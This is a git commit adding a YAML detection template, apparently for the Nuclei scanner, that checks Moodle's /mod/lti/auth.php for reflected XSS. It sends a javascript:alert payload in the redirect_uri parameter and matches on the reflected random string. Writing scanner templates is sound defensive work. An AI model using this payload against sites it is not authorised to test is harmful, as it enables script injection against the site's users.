Adding moodle-xss

patch-1
sandeep 2021-04-12 23:55:06 +05:30
parent 3e87b93258
commit 17d836b2c4
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: moodle-xss
info:
name: Moodle redirect_uri Reflected XSS
author: hackergautam
description: XSS in moodle via redirect_uri parameter
severity: medium
tags: moodle,xss
reference: https://twitter.com/kx1z0/status/1381588818256617479
requests:
- method: GET
path:
- "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{randstr}}"
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"